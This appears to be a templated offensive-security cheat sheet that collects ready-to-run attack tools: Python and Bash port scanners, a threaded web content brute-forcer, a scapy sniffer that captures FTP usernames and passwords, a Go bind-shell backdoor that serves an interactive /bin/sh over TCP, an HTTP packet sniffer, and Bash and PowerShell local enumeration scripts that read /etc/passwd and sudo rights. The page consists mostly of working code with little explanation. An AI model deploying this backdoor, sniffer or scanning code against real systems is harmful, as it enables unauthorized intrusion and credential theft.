Why this topic matters
Quick Reference matters because it changes how an operator frames the problem, chooses validation steps and decides what evidence is strong enough to keep. In real work, weak handling of this topic leads to wasted time, noisy testing and softer findings.
This brief treats quick reference as a reusable field reference. The focus is on attack surface, decision points, practical workflow and the public material that is worth keeping nearby when you need to execute, verify or explain the subject under pressure.
Core coverage
The points below capture the main workflows, concepts, tools and operator decisions associated with quick reference.
- Python portscanner
- Python content bruter
- Python netcat ersatz
- Python ftp sniffer
- Go portscanner
- Go netcat backdoor
- Go http sniffer
- Bash automatisierung
- Bash portscanner
- Bash privilege escalation
Commands and snippets
import pyfiglet
import sys
import socket
from datetime import datetime
from termcolor import colored
port_map = {
21: "FTP",
22: "SSH",
25: "SMTP",
80: "HTTP",
110: "POP3",
143: "IMAP",
443: "HTTPS"
}
ascii_banner = pyfiglet.figlet_format("PORT SCANNER")
print(colored(ascii_banner, 'green'))
in_target = input("TARGET:\t")
target = socket.gethostbyname(in_target)
print("-" * 50)
print(colored(("Scanning Target: " + target), 'red', attrs=['reverse', 'blink']))
print("Scanning started at:" + str(datetime.now()))
print("-" * 50)
try:
for port in range(1,65535):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = s.connect_ex((target,port))
if result ==0:
if port in port_map:
print(colored(("Port {}({}) is open".format(port, port_map[port])), 'green'))
else:
print(colored(("Port {}(UNKNOWN) is open".format(port)), 'yellow'))
s.close()
except KeyboardInterrupt:
print(colored("\n Exitting Program !!!!", 'red'))
sys.exit()
except socket.gaierror:
print(colored("\n Hostname Could Not Be Resolved !!!!", 'red'))
sys.exit()
except socket.error:
print(colored("\ Server not responding !!!!", 'red'))
sys.exit()import queue
import threading
import urllib.error
import urllib.parse
import urllib.request
import pyfiglet
from termcolor import colored
threads = 50
target_url = "http://testphp.vulnweb.com"
wordlist_file = "all.txt" # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) " \
"Gecko/20100101 " \
"Firefox/19.0"
ascii_banner = pyfiglet.figlet_format("CONTENT BRUTE")
print(colored(ascii_banner, 'yellow'))
def build_wordlist(wordlst_file):
fd = open(wordlst_file, "r")
raw_words = [line.rstrip('\n') for line in fd]
fd.close()
found_resume = False
words = queue.Queue()
for word in raw_words:
if resume:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print("Resuming wordlist from: %s" % resume)
else:
words.put(word)
return words
def dir_bruter(extensions=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
if "." not in attempt:
attempt_list.append("/%s/" % attempt)
else:
attempt_list.append("/%s" % attempt)
if extensions:
for extension in extensions:
attempt_list.append("/%s%s" % (attempt, extension))
for brute in attempt_list:
url = "%s%s" % (target_url, urllib.parse.quote(brute))
try:
headers = {"User-Agent": user_agent}
r = urllib.request.Request(url, headers=headers)
response = urllib.request.urlopen(r)
if len(response.read()):
print(colored(("[%d] => %s" % (response.code, url)),'green'))
except urllib.error.HTTPError as e:
if e.code != 404:
print("!!! %d => %s" % (e.code, url))
pass
word_queue = build_wordlist(wordlist_file)
file_extensions = [".php", ".bak", ".orig", ".inc"]
for i in range(threads):
t = threading.Thread(target=dir_bruter, args=(file_extensions,))
t.start()#!/usr/bin/python3
import optparse
from scapy.all import *
import re
def ftp(packet):
dest = packet.getlayer(IP).dst
raw = packet.sprintf('%Raw.load%')
user = re.findall('(?i)USER (.*)', raw)
pswd = re.findall('(?i)PASS (.*)', raw)
if user:
print("[!] Detected FTP Login %s: " % str(dest))
print("[+] User: %s" % str(user[0]))
elif pswd:
print("[+] Password: %s" % str(pswd[0]))
if __name__ == "__main__":
parser = optparse.OptionParser('Usage: -i <interface>')
parser.add_option('-i', dest='interface', type='string', help='specify the NIC interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print(parser.usage)
exit(0)
else:
conf.iface = options.interface
try:
sniff(filter='tcp port 21', prn=ftp)
except KeyboardInterrupt as e:
print("[-] Closing function")
exit(0)package main
import (
"io"
"log"
"net"
"os/exec"
)
func handle(conn net.Conn) {
/*
* Explicitly calling /bin/sh and using -i for interactive mode
* so that we can use it for stdin and stdout.
* For Windows use exec.Command("cmd.exe")
*/
// cmd := exec.Command("cmd.exe")
cmd := exec.Command("/bin/sh", "-i")
rp, wp := io.Pipe()
// Set stdin to our connection
cmd.Stdin = conn
cmd.Stdout = wp
go io.Copy(conn, rp)
cmd.Run()
conn.Close()
}
func main() {
listener, err := net.Listen("tcp", ":20080")
if err != nil {
log.Fatalln(err)
}
for {
conn, err := listener.Accept()
if err != nil {
log.Fatalln(err)
}
go handle(conn)
}
}package main
import (
"fmt"
"log"
"github.com/google/gopacket"
"github.com/google/gopacket/pcap"
)
var (
iface = "eth0"
snaplen = int32(1600)
promisc = false
timeout = pcap.BlockForever
filter = "tcp and port 80"
devFound = false
)
func main() {
devices, err := pcap.FindAllDevs()
if err != nil {
log.Panicln(err)
}
for _, device := range devices {
if device.Name == iface {
devFound = true
}
}
if !devFound {
log.Panicf("Device named '%s' does not exist\n", iface)
}
handle, err := pcap.OpenLive(iface, snaplen, promisc, timeout)
if err != nil {
log.Panicln(err)
}
defer handle.Close()
if err := handle.SetBPFFilter(filter); err != nil {
log.Panicln(err)
}
source := gopacket.NewPacketSource(handle, handle.LinkType())
for packet := range source.Packets() {
fmt.Println(packet)
}
}#!/bin/bash empty="" while [ "$1" != "" ]; do case "$1" in -i | --ip ) ip="$2"; shift;; -p | --ports ) ports="$2"; shift;; esac shift done if [[ $ip == $empty ]]; then echo "Please specify an IP address with -i" exit fi if [[ $ports == $empty ]]; then echo "Please specify the max port range -p" exit fi echo "Scanning: $ip" for i in $(seq 1 $ports); do ( echo > /dev/tcp/$ip/$i) > /dev/null 2>&1 && echo $ip":"$i "is open"; done
#! /bin/bash user=$(whoami) echo "USER: $user" echo "SUID set" echo $(find . -perm /4000) echo "SGID set" echo $(find . -perm /2000) echo "/etc/passwd" echo $(cat /etc/passwd) echo "IP Config" echo $(ip addr) echo "SUDO" echo $(sudo -l)
Write-Host -ForegroundColor Green "Enumeration Script" Write-Host -ForegroundColor Red "Users:" Get-LocalUser | Select * Write-Host -ForegroundColor Yellow "Network Interfaces" netsh interface ipv4 show interfaces Write-Host -ForegroundColor Magenta "Network Adapter Infos" Get-NetAdapter Write-Host -ForegroundColor Cyan "Permissions to C:" Get-Acl C:\
Curated public references
- pwntools Documentationdocs.pwntools.com/en/stable/
- gef-legacy.readthedocs.io ยท Latestgef-legacy.readthedocs.io/en/latest/
- pwndbgpwndbg.re/
- Shell-Stormshell-storm.org/
- Exploit Databaseexploit-db.com/